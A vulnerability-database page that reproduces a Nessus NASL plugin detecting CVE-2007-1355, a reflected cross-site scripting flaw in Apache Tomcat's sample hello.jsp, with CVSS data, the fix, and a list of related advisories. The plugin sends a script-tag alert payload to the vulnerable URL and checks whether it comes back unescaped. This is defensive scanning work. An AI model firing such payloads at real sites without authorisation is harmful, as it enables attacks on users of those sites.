Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2007-2022 Tenable Network Security, Inc.TOMCAT_SAMPLE_HELLO_XSS.NASL
HistoryMay 21, 2007 - 12:00 a.m.

Tomcat Sample App hello.jsp 'test' Parameter XSS

2007-05-2100:00:00
This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.
www.tenable.com
457
JSON

The remote web server includes an example JSP application that fails to sanitize user-supplied input before using it to generate dynamic content in an error page. An unauthenticated, remote attacker can exploit this issue to inject arbitrary HTML or script code into a user’s browser to be executed within the security context of the affected site.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(25289);
  script_version("1.27");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2007-1355");
  script_bugtraq_id(24058);

  script_name(english:"Tomcat Sample App hello.jsp 'test' Parameter XSS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a JSP application that is affected by a
cross-site scripting vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote web server includes an example JSP application that fails
to sanitize user-supplied input before using it to generate dynamic
content in an error page. An unauthenticated, remote attacker can
exploit this issue to inject arbitrary HTML or script code into a
user's browser to be executed within the security context of the
affected site.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/469067/30/0/threaded");
  script_set_attribute(attribute:"solution", value:
"Undeploy the Tomcat documentation web application.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/05/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/05/21");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:tomcat");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.");

  script_dependencies("tomcat_error_version.nasl", "cross_site_scripting.nasl");
  script_require_keys("installed_sw/Apache Tomcat");
  script_require_ports("Services/www", 8080);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("audit.inc");
include("install_func.inc");

get_install_count(app_name:"Apache Tomcat", exit_if_zero:TRUE);
port = get_http_port(default:8080);
install = get_single_install(app_name:"Apache Tomcat", port:port);

get_kb_item_or_exit("www/"+port+"/generic_xss");

# Send a request to exploit the flaw.
xss = raw_string("<script>alert(", SCRIPT_NAME, ")</script>");
exploit = string("test=", xss);

url = string("/tomcat-docs/appdev/sample/web/hello.jsp?", exploit);
w = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);
res = w[2];

if (
  "<title>Sample Application JSP Page</title>" >< res &&
  ">Query String:<" >< res
)
{
  # There's a problem if our exploit appears in the query string; eg,
  #   <tr>
  #     <th align="right">Query String:</th>
  #     <td align="left">nessus=<script>alert(tomcat_sample_hello_xss.nasl)</script></td>
  #   </tr>
  qstr = strstr(res, ">Query String:<");
  qstr = qstr - strstr(qstr, "</tr>");
  qstr = strstr(qstr, "<td");
  qstr = qstr - strstr(qstr, "</td>");
  # nb: qstr includes some extra markup.
  if (string(">", exploit) >< qstr)
  {
   if (report_verbosity > 0)
   {
     report = 
      '\n' + 'Nessus was able to exploit the issue using the following URL :' +
      '\n' +
      '\n  ' + build_url(port:port, qs:url) + '\n';
     security_warning(port:port, extra:report);
   }
   else security_warning(port);
   set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
  }
}
VendorProductVersionCPE
apachetomcatcpe:/a:apache:tomcat

Related

openvas 20
packetstorm 1
securityvulns 3
veracode 1
freebsd 1
ubuntucve 1
tomcat 3
prion 1
nessus 13
cve 1
fedora 5
altlinux 1
redhat 3
openvas
openvas
Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
2015-04-15 00:00:00
FreeBSD Ports: apache-tomcat
2008-09-04 00:00:00
FreeBSD Ports: apache-tomcat
2008-09-04 00:00:00
packetstorm
packetstorm
CVE-2007-1355.txt
2007-05-22 00:00:00
securityvulns
securityvulns
[CVE-2007-1355] Tomcat documentation XSS vulnerabilities
2007-05-19 00:00:00
Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2007-05-19 00:00:00
CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities &#40;Updated - v1.1&#41;
2009-01-28 00:00:00
veracode
veracode
Cross-Site Scripting (XSS)
2019-03-25 08:40:43
freebsd
freebsd
tomcat -- XSS vulnerability in sample applications
2007-05-19 00:00:00
ubuntucve
ubuntucve
CVE-2007-1355
2007-05-21 00:00:00
tomcat
tomcat
Fixed in Apache Tomcat 5.5.24, 5.0.SVN
2007-03-08 00:00:00
Fixed in Apache Tomcat 6.0.11
2005-06-30 00:00:00
Fixed in Apache Tomcat 4.1.37
2005-10-06 00:00:00
prion
prion
Cross site scripting
2007-05-21 20:30:00
nessus
nessus
FreeBSD : tomcat -- XSS vulnerability in sample applications (ab2575d6-39f0-11dc-b8cc-000fea449b8a)
2007-07-27 00:00:00
Apache Tomcat < 6.0.13 Multiple Vulnerabilities
2011-11-18 00:00:00
Fedora 8 : tomcat5-5.5.25-1jpp.1.fc8 (2007-3474)
2007-11-20 00:00:00
cve
cve
CVE-2007-1355
2007-05-21 20:30:00
fedora
fedora
[SECURITY] Fedora 8 Update: tomcat5-5.5.25-1jpp.1.fc8
2007-11-17 05:37:36
[SECURITY] Fedora 7 Update: tomcat5-5.5.25-1jpp.1.fc7
2007-11-17 05:34:43
[SECURITY] Fedora 7 Update: tomcat5-5.5.26-1jpp.2.fc7
2008-02-13 04:55:03
altlinux
altlinux
Security fix for the ALT Linux 5 package tomcat5 version 0:5.5.25-alt1_1.1jpp5.0
2007-11-30 00:00:00
redhat
redhat
(RHSA-2008:0630) Low: Red Hat Network Satellite Server security update
2008-08-13 00:00:00
(RHSA-2008:0261) Moderate: Red Hat Network Satellite Server security update
2008-05-20 00:00:00
(RHSA-2008:0524) Low: Red Hat Network Satellite Server security update
2008-06-30 00:00:00
JSON
Related for TOMCAT_SAMPLE_HELLO_XSS.NASL
openvas20packetstorm1securityvulns3veracode1freebsd1ubuntucve1tomcat3prion1nessus13cve1fedora5altlinux1redhat3